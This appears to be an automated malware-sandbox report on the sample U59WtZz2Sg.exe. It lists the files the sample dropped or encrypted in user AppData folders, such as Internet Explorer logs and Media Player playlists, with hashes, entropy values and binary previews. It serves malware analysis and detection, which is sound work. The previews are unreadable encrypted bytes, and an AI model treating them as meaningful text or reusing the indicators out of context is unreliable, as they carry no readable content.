Preview:	06/27b.b..)&...>E...A.m..w.z....[#.+...J)L.X.M.....z..Q.!&......(..-+\}.1...s..<M.ngX......7.L.6%.,..+.`..J5....^A.l9b. ..{.6......Z..(.w.R...e....o8.....b.....7...+. }].&..E.'ZP:.\|...N3m..azY.....$.~.......Z-Kj.......AV{z.d[...9...\H.^(.....N.....`U.\j.O.....%]SA.NE..>.z...41Cug...AD$.a.6R..9.+.).,.np.........`...;.h.a..<...1..;.o...g...4...X...n.9.H}..ecc.s..j..n..&,.9z..0....U...d.......C....RN.....9O%+......VZ.(.....Z...kR..D.{_Dz...n....D.M....8...~e....5#....+...0.P.R.Q....y.Q...o(....W.kL...Nk...J[.......e.v[u....wY....1.F.."$3..^..kd..w..[..M.Y....&.N.#...w..r.eM~..JK.;......X.W.. d...'B<e.'.X.;..S.H.ex.k'.O;?..}[t...7...}.jR..b.......d8...p..Q.?.\|....8..x.<.n..ZQ...W..k.+...H..J..a.<.?p.%[.M......i;..yS .7@.....i.i..45.........-.K...[._.n.F......m=*..1.........z\\...b....7.asq..dC... ....s.. .D.........<......+...US87....^.......>......MX3...e.H.^...a.FS...l.hn$....e.c1^_...j]#....n.$q....8p.O...).g..V...0\.h...WT..E.'Rb

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	7.717942608995989
Encrypted:	false
SSDEEP:	24:QGetwPt7Ajdviu4HLj7wyrouKRjIcmpbD:TZgvius/wPuKBfmJD
MD5:	475AE4D93C552A94F5E70A3272A52B87
SHA1:	46525DD0C62AD11602E5F15EA5CD91657659058D
SHA-256:	A45BCE88B41E465DD791ECCA90D1BF5537C3D533FCBEE480214ED86D012943CD
SHA-512:	B64968EA823F4CB5380AC3231E8998F2F9E8BE9E54709C98CA52A6B40BD6E4E803C01C359D9D031D375A2253B5C132CD43239729B85B12A98BB7D013D5C3D003
Malicious:	false
Preview:	..0.6.W.}\|zY.)....)... ..x..'...w.Y..!.......R.O.t...v...\|.q-W../......hA.c..0...7\1f.#.ikX.F.DsI.L....X....r...,.M..@.z.&.}..KU...j.=..4.\|].....A....0...w..`...^.....Z9.^...X.....k>..0l+.Q..q....>V..W..-A.7.C-......B9..}4.\....^..D..r.'~.x...4>g]]n....L.....hQ...x... .}q...;...7...B.V.R..=XJ...ZL.6..3W\;..P4..N..#T....{..X.pgl..2q..>u.d]........:w.D.s+..a..ln@....4..3...a].Y.C....O.S...4.s7...W\Y.PcRD....]....+..@C~)....0...u.i..R`W..t.(.VFU....+>..9t.9F.q.G.....:...\|...,.O"Yp/M..y..7>.}.....!_.....:.....u....,.QN..g.....B..4c.....].v..7bjt?.R..v.2..........Z.h\|...)U{..a....D.~..6....7.k....q......O^.PG..d C...[U.y...v.j..~$E..z%.I..wlo.L]a.....m...uJ.._.g...). 7<.i.N..#:...B.n,..z.U...#..Jud#sO.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1648
Entropy (8bit):	7.865877170487207
Encrypted:	false
SSDEEP:	48:/nMvHI2IDB9J0KtdGvNJ4jpBI7sEETAVf2r8KD:MHZIfJ06duYpBI7sEETAAr8C
MD5:	E90193039F7E00EE13B3ABB9836C170D
SHA1:	033E1421E5B8CF0C915DE0A8502C8A09BDE56CD9
SHA-256:	A9D8E3416CDBCEF9CE23D408D7627318647A404FB7A960D5868BEDFBE26C554C
SHA-512:	4C4E5BA2CE068C09371DF621714F08720BA744E77C21C2DAE39E32B68D4010D7B4AAE7F81AF9DBBDCB89418A061F5FAC7EEB092DC591AAC9CE67548BBEECFC23
Malicious:	false
Preview:	..0.6...k.1.TE....Ff.Uh....[..N.p.}.1h9.<...m.?......W.m .!.n.P.....aa.E.AX\..`s2A..\...j}..1...au-......f.&.b...q[....j.....F.n.d..e.=!ETN.O...6@....x.Cx....TQR).....T.Ihz..e.........jj....$K...E..B...pKT......W...U".:...f.X.]J.!.vQ.....l...l.j\|K,.?K2[.....W..........s.)}.L..C.BDW.i!..{.5oS..;...$.[...7./..MY\|.I. ..Lm...t./._....C..#P.....o(a9..m..U.!._a...@B:./ ..rh..Pf8.-.'u...w.....H..0u....7`,..i.V.V...TQ.q....}..txK.;e.+.^..........gj.._...q./..X1RqM.......p..&......z4.....8.D.q'.C.M.Zx36.s\..#JB.;.P.z..&..n.f..G.....%H(....`....=9.x.../..a....P.Pf..P..v<...A7x.3.L..sV.+/S#..I.....O..<...(...7jz.......I.X.D.a...n.....u..3}.7...!.j.{...Hv....}...<...-XM...1....a.......M.h:.-.r\|&R.....aZ2..p9.0.k. \|.c....]..KL."..D.T.8+..A..j.E..\c..{mF.6.c.._.O{.G.vt:....q......7..<.Q..90..a(yQ...........>..E.....9~...\|.Bc......e.y..;g...../..".5..1^....a...@D1K.5.......BB.M.y.............MpW..m.%$.{..a. .....Y.yf.9.f./. b...I.r...X.D.<r.f..&

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	21730
Entropy (8bit):	7.990557951184268
Encrypted:	true
SSDEEP:	384:lUuLtcpVjWZtZqe1o8VLnWDhHgbgJgZhtnFgAp3QTKqBwAja2vi8:OuLEFkViFnJgZLnFXp38KRADi8
MD5:	0BDA96DF13B1B2D3830060B33DBEDE24
SHA1:	8122E5A96BEF9C0ED6114758FA4F8ACBDAA8BB62
SHA-256:	25CF545A179E775CA2F190D68917A3319B6C8A6AF57B32F17C58BAFD2239005C
SHA-512:	82AFE5F20433042730E47678B80F104F200861CFA109BAA21C9936BAF68CDFFF42CF0BE10BA3F3EADCD7ECEE0B8A915D1A671E25FD000EA3C05E795BB96E9772
Malicious:	true
Preview:	......@....a..i6qH..K....].u....B.o#.u#.QY...T(l...`....z.+.W.\|=4...Z.Z...6_X.Q.w..!{..+R.E.ixS<.....V~..0wf@;#B.@R.3....A......2~.8.%.DP.6....:.kd....80....F.9...~..b.w..y.S-e$.......KU`Q......f...J...:.Cc..le.:.2...O._..b."..ung`.y2fk=O.8.".@.... f].._...$..E...M.......n.\.....qZ]...L...;.'.-wJ....=.aW.<;......\|g..P'..sT..'...5x.^.=.f3..i..f.af+...T..T.u+lL.c..T2.!x......L..(.....H.K\|.........._.....K.z.T@.z.;./3..{'u...^...?..8....U."O&k...T'?....__..l!...y.6..Z..,...\|.B..p2z4n..Q;z...i.1........2T..NnI.j..BU.+...$N&.....>....Q.."..P.T..;..?.5.D...^]Y..Ql...h........x/..M.j.A.=b.h.Cl8._N...`...<..h..%.c1%C.Q.L,........u\.EA.H.....v./...N.E [.V..Q.3b.R.D.LLV........z?\|I..n..5I....1......LkBV..I.e"...1/2....U..\.%/<...Z.0...}6.^....g.j....'g.....=W..t......SS..-..F.\..^T.$?.:..\|.a....A.F.l.........e..R=...V.f7Pw/l.(.J......A..=.W...a.VC......+H.cJ..[.-X#.`.u.*."M....9....$...b..m..h.....b...c..6I....h....EQ......O;.......{...

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\01_Music_auto_rated_at_5_stars.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.829140548717492
Encrypted:	false
SSDEEP:	24:Fs9CHklCmQSolasG1+QE0mz3DOz+T649W8ta5LFmxoA9N0UU5EjQRAJfM/cJibD:FsBlCmQ5DG1+lx3qz+WOhmLF0oGN0UU5
MD5:	EE0303883ADF4BABAAA8611BA8C784F3
SHA1:	5F3B3AD898C7D20919984230DBF42442F0F1CAF3
SHA-256:	1303AEE03ED337B485CB207F22B7D2EBD9FEEA3C0178CEF660D3652878517C7A
SHA-512:	B8B8B6735261E28CF91733154D7DCC7E64A7E0346E9F103967B20DF6264AF761E75A43AA881A00A6FFDB810A6049115D950BFB912C5333AC8C47384FFBF1790F
Malicious:	false
Preview:	<?wpl....^}..E.....>..<9.K..I2...R.Rh.%..?.u...7s#n....(..7n...y.s.....r,...z8...R6....X..Y.;E^y...Wr"....s3......k...2..W..j....!`,..Hd.....;......i.].A..jp.S]r.0.jYun....IU..m..lg(..]c]......}i.....)M.N...~..tl.U..o.H..F...(\....W.%{..=..S}..\|zU...wxG..`j;..2.3 ..Ab.."....bA.e...d{.vK.J...wW.g!{b.......'@...m._Ss..f......d.eyX:..<d.t....4.......O.<....).....iGs..Nw..X...6.A..D.=\.$../..S...q..W..._.ZM...^E..X.G.9.x.........xF...-.e....W.DUC..lu.Zd...?Z.v#{...L.\|0.$...n.g......r..7.dU.). .+.B.+.,..y.c.?.g.&B.i.Z[.83TAr ..8...I.va..Pg..J.O.K..!...`Vh4...x"[.....s@.`.3.c@.{2...P....x.......DD...........2..B.....Q].(m.]i...\|.....A</?...F...C.).........T..{;n....#{...s.9..\..Qu;..aG.i..E0(e.'.........c.t..].\|.....G....!..s[+..G.... rQ... nn.. 'X^B.O..r.p_.Y..\|.^..M.<Z.A.s.r...v.....=w^.SD....1c......%"*.Ns_H..W&...w.8..<.7.c.`......v_....%.7..a..".7...o\U$.....L.A.Y.n.....w..n@.Be...n....5.uM.W..c.r.Z....E9X.:.b.i..5..""..[73.Z.K_.....mG.

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\02_Music_added_in_the_last_month.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	7.8661148776263055
Encrypted:	false
SSDEEP:	24:eCdbNs63uLC/F9l3UhrdJ6k9XOyu4RXzNCI9RpFlfYecmr35iZVVHK53TGMbD:e7bsFsPD9LDRXz/fYecmj+VV1GD
MD5:	4C44B6575CBE101267BEC92AFF14D557
SHA1:	FE41745C29921C257427772F89C79755EB9E1390
SHA-256:	F248F37AAC20F07E6043993AA64B0FF9678F0410E0659318F61199C09D42321C
SHA-512:	4947683F5F1FB2851AB2394955A9AD9BCAD0FA0441B0808CFAFB74CD6022ECD79DAAB1B9726FF5DD9D4D83E1BB2B5071B9AA5199F3DDF5BD0D6C19594FBA4DBA
Malicious:	false
Preview:	<?wpl[t..^G.$........gY...X..Z.d.f.>..,x...........q^....G...j...3'.4.cb.....(.......8m..2.......(..oCE.4c.. \:t....y..?.".......N...?...j....I.z.}.2.....s^Zv.Q......A..(u....v....W..;...\|.....-....U...F.E8N....\...".r..5..KbgL..I.Fn.:G...6..8...v.m....9Wt...h.:.i!....q..... .dsP...m.Y....I@O,......m..DCX.v.OV..H....D.....v.....k..h.....Q.h]..bF.WJ.Hw.....9....r..k...o.....5.SdU>.pt.X%....^...W..`.x,.O\|J.yk.E<S.....S..j...N..,...a....i......v&..$.......u.s.nIe.^@Q.K0...u..x+.wv..>...n.e.....}..j....=c'..*...-....~.......7Z..KD.-..Ro.5...%.#.V...[..M...{.....6...~.~<-./.W.jO........b.....$...#QX.gS...,.pZ..u..2.....\|l){.c.^..<..P.uR>.S`.....h)%....G0......A..1\u.../3.,C4&....KmE.l.E..0...-.....~zc..pt.....i.`.u...~..C?....>.`~..D..m@.'..5.m..z..~..Dn..mj.&g.~-].bi]........r..g......B......-.X...?.#"...7.....br{....k.....S...:..T.a.X.....-X....\|..s.Ug.U@...7.............C...i.ks.Y.,M..N.i......Y...v5....<..2t...0.!i...T....R...

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\03_Music_rated_at_4_or_5_stars.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1601
Entropy (8bit):	7.873987701866653
Encrypted:	false
SSDEEP:	48:jOWuAM4mHcHPByRjSP+Xsix81TI4MhtIhTJD:jbyHcHZeuP+XsioT7GihTh
MD5:	9393A586DD2114C22BAB2B35DD8A275B
SHA1:	4FDB97EED704F96DFB486A5A902C29778BF5F788
SHA-256:	721763E8BC8689057D629AA9018996B15FE46B5DC31DF00BE7C5A2857CAD7CBA
SHA-512:	F532D752B12A93D5806BA0C683C308C6602A8D9424C4C1EEBF5B66C667990D9967D6CC09867626190E0E465A6E05B413996A3012339F7BA87AC822930F4A23E2
Malicious:	false
Preview:	<?wpl~qjc...d?.d. =.CWJa~y...[.C=..g.?..p1oW_.....qS..).O.10?^.....Bv.b.r..;....c.c.........u....f..b.u..uyyObc.R5%.y.G.g......p....._=..lF....'.....>2.7^....<..9..........0......,T.{...o.K...<.....pGX..Dm.......0.J.wW....<.."..}...#..T...VQY..`....m.aUo. M.$....8o...K......X.....Og}..v.......+Cr:..l.......A$.X.;....mJO......pU1I\.....".Z.\|...:...Vk.<v..l..sN.S.b..P..K...A;...y,t.....[.e5.o.d.....#...l/?C.Rq\...pEnHt<P;E..W_\.... .f.`.#..5.>.(s.....Tl\|.}.u.O.)....X.._._........[X........A......C../....z...,l...cfJ..X..0.bV..i.m~...l.sD$n}...oJ+=7...).0...A....R."..o......h.E...U.L&.........a...2.........P..[-q.....<.....ZQ.`..q..,....;...:...n,..}.z1....R...=q:EH.....a.Z.....>j..PC.C...q~.v..V..{.....(....8g..j.1..+.....P.g+..mTeaO3.=.FP.^..'...V.3.."...\....S..d.qJN.eZ...>..o......F...Iu.Sn.2..{..x.lLn3.:A....T..#BU^.:....b'..\|..^p.r...J..X......a..<Qj...........I0..JR.....]\|...qk......D.WO...h.r.r5...SUu..a...E@.6b..Lc...j.

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\04_Music_played_in_the_last_month.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	7.884753639469964
Encrypted:	false
SSDEEP:	48:w+02Zc/751k/NQ0bVTUlCBskpauZNmNG3G06UFD:w7NmfYkskczU9
MD5:	9251267D57DB1A9FB69A17A7FD851CA5
SHA1:	2BE60C58C715A177F6CF4F72FC8306E21DB1A8B7
SHA-256:	1BA4F9BE14DEDAB713EC02845B057F4DB568AD1E6EDC615F4809B8DCCC8ACE75
SHA-512:	4E9E2118616EA0C322C9998F8C14333AFBEA84ACBB7EC977BA702891443DE8532AAC1FDD3F6911E14264B98442FA7FBCACC683D7B0161C6EDAC4FB78ED9B42BE
Malicious:	false
Preview:	<?wpl./.d...i.H&U.?.`....e....l..>.....b..D.g..T.n>k..:.!.K.4..n.<s.....\...n..T.v...9.rE...j.&1.{...^6..H...fI...;[.$..^..L.4-...?.o.5.....:.5...X..TO..u>.r.j.....0st.....[.@..<..1.q.7?r.';.;j.I0<...`..].....V..DA@..k...Q..`.\....9.y..2=.l.f..q....;.r....HA?...~...iX$.>.......P.:u..{....$&A.i.G..l......k..O\|.J.q..6...Qrv=.l...3....Hrs..R..........FEz....W.....9T.'<q....X.U.`L..<..+...P.lp..^..~vp..`...<....<(.M7...xt.=.....[.>...'......vR....>j.UF..S.......^..X...5..N.._.L..!...r"\............[9NN..K.o....B&L..."....6...Db.........JU....c....V..k..)n...n.@.0...,7.p............(<b...<....l#...SU.......G....gZ...%.h.H........w.}.>..E.>A..^V.x:..#.D..l?~A.....Ms......:..Z.b.~b8.`...sK..I.R.`s.\|..q.....r.}y...:9v..B^.......7#.\...z..,..jx.*r.....2.y./".2..B...hUFy......b.'G.C+d..e.vp.....-....+....B.h#..yW.......g..4~7....hu.n.p.z...:.....VhDI...x.:G..~'.J.U.L....E..I5...:. a.WI...}U....KDIR....;..L......_l._#....j.6.D....Y..`.q.

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\05_Pictures_taken_in_the_last_month.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.803235599173458
Encrypted:	false
SSDEEP:	24:zg53lH0v378TXjSvrWLWqi7UQcmuBuPFTebD:z2qvr8TXmzWLPQXu4PFTcD
MD5:	A30D6BCF5ADFE72AE4ED0FD35152CC92
SHA1:	E92872F4F3E7C8CDC96D9B828FAE0E61E52361C0
SHA-256:	31DED04C96EA86F29E4A69DF48651879D2CF177676F0C4E407BFB93952FAA885
SHA-512:	8CD38A68FD61346C7E2D12B98753D408E8994C9A336B0230169157B903211B93EC29E150AF94ED7D91B8823DF29F1AD55C2DEDA09C2150F3CFCC8E3657C77D5A
Malicious:	false
Preview:	<?wplC..$]...duIY.U6... e...e...:.xf-.[..l.1q...z%zK.1.....8e.L..(.....[..r..2.n....q.\.:.#.%Q.Z..X".....kdt.......(+..>.....cZ.......J.@IS.....;.X.Q...$.....X.[......i.Js@N..t..5Hy.....Iu:D.....s.f..v[Z..2.....2....y.8...W.b.Y.<...a.Q] 4.. .0...S.........`.{x.0......4.~Cw{z;.i8.....D.s....[...O..pI.5..L.3%.k}.H....x._..6...L?[..nD..B...{2.....:,;.r...!....F.p..\U..KA.U..j.x.0vk.m..G.}...K.U...>r.~....Mk..+X.....'.K..p..Z..AT.........+.\y..kk..\...O.H......+....T..K.....?....K.#.......q.}s".:^?.F.....^..,..tsG....N0e......y..o.h%.....N..F..."...X.-.T.!"o..H1...+\...>.luC...'.C.K..@1......q..........:..GT4]VS..~TTP.F.2.K..Y.#._rA...{.....G..........;.i9...N.8U.Y.!.$.%....:....n-.............b.r.x.R..VJ..j... ...g$..yI......z.K.D..;.#q.\|..-.\e.oOJ-....o....q\.j..B. ~.@~...E....Gq..J.p^.-O......V.dE.(.8Kik...DB.../.0..]..A.o..+..\|}.UH..H.....7.....W....yVB...Q.QP..%z~N..H.......2. ........T....".,......WTw.o..y..6aYe.@.`..}.y}..1.?.M.....c.G..n.9

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\06_Pictures_rated_4_or_5_stars.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	7.817995584462159
Encrypted:	false
SSDEEP:	24:7I2er7NSmUyqyqRH955AmX9bc842IQ3CWXuO4P/1IbD:7I2CqnzZX2bxQ3iID
MD5:	A92ADC384AFA10B91FBFE01D6B13C67C
SHA1:	5FDA34B3A75F609D158256BAE50548E3D59E48D4
SHA-256:	A3340CF1469F4D485346BA3754D8F10A2A2D5DD2DB0FD821569E501525D3441F
SHA-512:	1EB28D63CDF5958288D2119E4CF396EDC5DD6869CA09FDC179DD5DB23671F835E8FCBD5F9576BEF9736F5FE345A7AA56FD43553C743C79D25CA4ADEAB9E04B88
Malicious:	false
Preview:	<?wpl[..d...1..#.X.;.=9~.^..E...#..c.@.....a_......?3....g.y{.7.6.I.:..3.......,.............Q..P.....)..~.B.;].D.....`.>....D}.n.S\|T.<......q....%..../n...S........#....K....a.....2/..~.p.e..XY..... :..!.F...).......IPM....5...+.. +..o..z_.b.....j.a.....DQRw....Q....u.....8.\.W\|..%....H.`..+....~~.7... .O..Rv..d..t...IB...aGoER...K..aW.......&.'......\MN.Uy..\ZR:..........Z..R...7.....2.Y.(....A...L.H..m..[.P.4...y...5p...%~./.u.u.K....Q..oO...\q....5..........&.#u......d........9 .....&>..~.)Y..........w-.B.Gr...ulV......<.=z.1...~B.A.kS.E..B...7...\|.......O ...;...@O...Z.!B.:.....M6<.a8..........Q$.J0....&.ZT.....;.,./.u..l.!].]...+.a18...R...m."...v../......cj.....w;6.......1.."8...o...H.o,...G..,..S....c\|Q)r8}.,...H..b.N/..8.Oz@.cz@..QC...~~.+1...%...p..O.=#.......g0.-.ZS.Z.e.7......L.`Oh..7./...p.H'.....d..`<K.cTB.`.&..o..h...q.......1...T.).(......V..d.hj.=......[..4+}..q<.*....?....7.U...Q<A....X.L.kDHT)....\|o..Cl..

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\07_TV_recorded_in_the_last_week.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1374
Entropy (8bit):	7.823493182421659
Encrypted:	false
SSDEEP:	24:pCSNQTx7zeNhZGbNDroJSECeS/4rvOlNv73qZaSF2hCh8F0/MhD/RGUZAEbibD:pRaTVShZGbNPUSE3S/4Qv7Cjvc00hDpS
MD5:	E50D2334130CF9D3D98D47AE6950BA76
SHA1:	0A366215864751893C57F3EFC5237FA53D68884A
SHA-256:	3BC838ECBC0E4A551DC71107DDA535A3D03B9D0FA04C7C12FB31DDD8D0E5743D
SHA-512:	928317A70428DD2A4165C74503F46A88698269C71B076B408C68D906885F92A9F7E83D9FD1372293BA55EA1FE043EC0A98C44DCF54415F152D0ACC0A72EA8122
Malicious:	false
Preview:	<?wpl.....z..SH]+.M.IE......J(`...N.jw.7....\Fh......I..3.G.....?.....@).</Oxq..2A<._i...;.d..7n.^z..y:...8..{...P!.Jj..7..B........!-.N..#Sdb.k%.Ds.;.$U.?~X..../8e...X..,t.Q...r`=S.n`.u.......Z)b......".$...?.a.....$.^.\@.....ji..&%....:g.......{'.C..H...^.q.!.D.Z.m.:zb..Aj.7.T....$E...y.....<B69.vf!.......?.}....h....f..e......b.MS.....yi\.w..BA..k...pDk.}.H...e.D8.g..fU....l.P..u......}..C0..H^.)i.`...2.i..<.`c}....Z.....2D.v.....m..Kv@ S@.....&v0.....w{..-/..4...K.y.#.d...ZY`+D....Y-..j7.{.s.....E..>X....T..;.0.....@.Po.;.....u..o...f.+].......j'..H/..+..]u(..8.Ln.D.f.a1..Z4dZH.y...c...)>.....<..<".c...<..t.f7.}D.{....@r.R3#S....3.s...........0v.].2.,...gQ.........d..?.a.........T..e.={s....6........../w.\5..@c....{.u.F.Zyd3....Y.+t.&\... .vjv.H..X#.}C...}a..$H....uIL..G.V0.#....'..R<.t...%L...2..?n.X..p..e).^DZbs..8(....R..+.Z...I2..C.....fc.#.E....?c...7.?\|r.....=-.:v..e.....6.^S.7"\|J..-...^Md...t....-~}!_l...D...i.....

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\08_Video_rated_at_4_or_5_stars.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.842532784357907
Encrypted:	false
SSDEEP:	24:kuYGa9FPGhOR3gHJLlhIw5YLXKiA8D5qfTdULO5hE33p78OwqU6+pXybD:kuY5FN+tjOPBD5qfZtrE1wqU6+1gD
MD5:	7D58AB090FF12F56DC276CC8C69768B1
SHA1:	89588B4A6D19A9092014E4F9843DDDD7C08C2805
SHA-256:	702762CD0BADE47A3DD00155977B0E897ADB9C3DD2E1328344B73265730A8957
SHA-512:	4A609425AFB96EA01223D264EFD0BBDB843A78CF89D28ACE04DD12E84E6CFA8DCEFB8E5A5CB01E8BB5CE9B8C7F4E7585E299074A1FFFD341B5FF08E10D73DE93
Malicious:	false
Preview:	<?wpl..r...L.6 "^...$K..I.;W.Ur_..C...9....\A...H.T.S.l...V....-.'K...e/6.xKc.b...w...h...8u!<..\.. ...T.?'....AW..".......+sh).C..?.._.R?o"..^b.;.jSJ.....:.Ev.Hx...[.........go............'.....Uk~.R..oS.O].8...br.<.4%..6...}..J!..Q...1..!..5.p@..R.<~.c...l.... >..5+...]hJ......v.....c.a.39.DG....C$.._4]C.FF@..=......I/.<H....A...Uu.gm.+o.....n3y....0Z..\...I7yW.C+...n.u.Zc..U..d....%.....&.P..;~6.J(4.\CP. .....VS.y.7..m.BPBn&e.1..6..A....V..^b.I...y..NF.v$hA..'.fjF.... =.;\/rq}.F9#..V........g.n.k..~..........hP[.g.9..*H.2....Ds.....Sg..G~.py.We..\......7..k3.("~......v..M.-nJ.y.w..........i.....8.>./..'....?..K.Z.s..........-..j..j..3Q.R.+.\|!%.H...<...........~..!t..Ue.......#y..\...g7....8.AeKWQ....C.kM..5)..%....x........z.U..?..e....6.Sc..\..d5.....U......]~.R}@Bk. trc.lM11........cY...3.].....,..VJa......gG.....d'.n,...%.+k...5..$o\..9.:....._...;&-cGl...cc..ir...p#...m.B...x[.3.K..=..K'LN2....Z..7.IS/j.......1Rc...U...C..r...Dg.<.\|

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\09_Music_played_the_most.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1359
Entropy (8bit):	7.851433837048521
Encrypted:	false
SSDEEP:	24:zF9PFadGqCBdd1NIvIYs/KT0J+uXTyEL8HNpjqAVwfoPLng4Osog+yk1RQsxtUbZ:zladcvd09s/KTRnHj3wf0g4h+IsxtUII
MD5:	10F83875CF4A2FAE526B95A98611952D
SHA1:	A584CF2C348AA3FC13A687227D247375BC6882F6
SHA-256:	9AD0C8A024E6CE2CFFB6135312FCB4D5A79E7C6883B3E18FF3DF43942FB95BF5
SHA-512:	AFB7776DF28060D66369887A34275F0D9E3511DA9075279B62EF9F0F95162D29A57F60126FC3E2B6BB697B66BC833B89004EBD38340B6FAB15E0E3C87F2B4B15
Malicious:	false
Preview:	<?wpl.s(q...B~...m.sX.8..=.W.G..Z........aP.....S!Y....?.J\|..<......e.'R.O...oBK..[...f.n$5.5.i.;..se......:%?>Q...G...y.........%U2_....S...v..GEi.-..1.P.Ba.WR.U.b......8......).r.....zr....T.w$W....C.'....6t.j...N.........&1.4.oR...I.D.Tl:.)..gT.)'8D..v/&.....u....r.pkoK.......'....7S.)fYs!'.T.....Ev..9.9.g......w.x...t.N...?..R.pPo...ZO\..U.h.......#.k.......A....Co..m..U.J..S.nf..%.>...%0...%.E.#.N.J..P.Blb.........Ht..j...l.t`^..=....0....x.E^......]).....;{.rc_!'>8.a.....(t.2.q.....::a!^..Y..Y...k3#.?.rz.2iK;d...Or5..T..t.t..6./.;+.D........y...AK\|.......ri......ug,...:)Z..<._n.S....?o.jw.A..).I........3Y................a.8..&...c...z.....ir...i..d!.=^.....B...yT.....G..)c.!...[.NZW4...&z.._....].%.ng.%I......N..wR4.).m...2....i.....SJ.V.).y...R.X..V........z....U..<J.N.j.F-i.q..h.>.....p..<b.S.8yL.#.q.)....8..y.9X...b.x13 .....j..r]..w....M..'................?'k.o....N...X!....SC<.....kP..Y......fA...l@9....&.MV......h.U..

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\10_All_Music.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1397
Entropy (8bit):	7.867851723378555
Encrypted:	false
SSDEEP:	24:30UX59OTVHIs2Hq69oU6Xfbkr/jMujejJ0SnKqW4h60HU2Rz4BcXm3amLbD:kUX54N/U0fbq48o+hqW4IA4BGCamvD
MD5:	C8BE24BDC2BA5E574B34E4485DD4C194
SHA1:	8592B2D1D98DF9C0BA5E4AEF253BDEB2E0BF3A32
SHA-256:	E1AD97C5F1854B0D1DBFDE004ECA11E3F8692FFA21049D6A2231C2B8279DDE7E
SHA-512:	C1AC318910DF16AFBD8EFA1F3A6C38343B73A39424080B13C294733668D4FD219090935B4E58AA1507E83D5C74EDE85E457F2D709B32F4E281A32E7867F9BBCF
Malicious:	false
Preview:	<?wpl.h..(>u.Ta...........x\..T.sq.(.j#..f2.....pY..c...B.T..x...pc...+s.#.i.Dp..(...\wR...........g.....m.)$B.yC........f...~,G..;.Y..\{~h...2d...E..@... ..~C..Y.?...rd.7...{.......F.jQ.Kag.D.......O.....#..............W4.pK...:.=......8...iP.../..T..t.T[.}e.Oq...'.g&#..r.B.J[\|.......%f^.......P....>R.mA:....u,.[.7.)...vZ.U6.vy,$.,.N.(.+..J....40H...m..kF8.....l(@._...5H.....+?....S.6.Y...:r.".S..?Hl.'{...rH.&5.Bv>.+.OW.....A.....>.w...iwSIw}z{.q_..<.t.-.L.Wdw...g>.OI..._E...[.{.0.k8..Y..`&......s...f.p}Sa.u>..W..].D...q{I..e..Aty.0.}:N9..R.Dd.....p.)J........?`....C..#d.c..^.~Py...).a_...v/..]..u..M.a.....O&.........3....V.z..M}....../U..h.o9/.8..N....iK.Y.f5..T.D..U.0p.N..B%..J85...e..q!.>.......v.'..).<..........,...o.M..O.w$.X. {.x.5g.4..b$..G....7).(.gd........z.!..88....E.1t..L..}1..B..5E.i.....9..v..'./.;.D.._......p.....D.$)LQ..o.....A..W...@9...=.>..R...L.f...>l..X..*.h....PF.6....9ZH.7..Kq.f......#xh.....:.e..i....)...d

C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00007464\11_All_Pictures.wpl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	919
Entropy (8bit):	7.750405213085717
Encrypted:	false
SSDEEP:	24:ThF438HzgxSMj0sIwJKAEmrSZZ5GDFXw1l7RXv4RgNTbD:tF4yzoj0sIE3ri5zv/kgNHD
MD5:	B3744FD0A490913067F67E239A2C246D
SHA1:	C878CA8EB3ECE72F2F05137B3B8ED6A7F603145A
SHA-256:	E6DF3C89685437A2E82D59ECF5B6518E3204548162BCAFB4CEF81BC87B73C49B
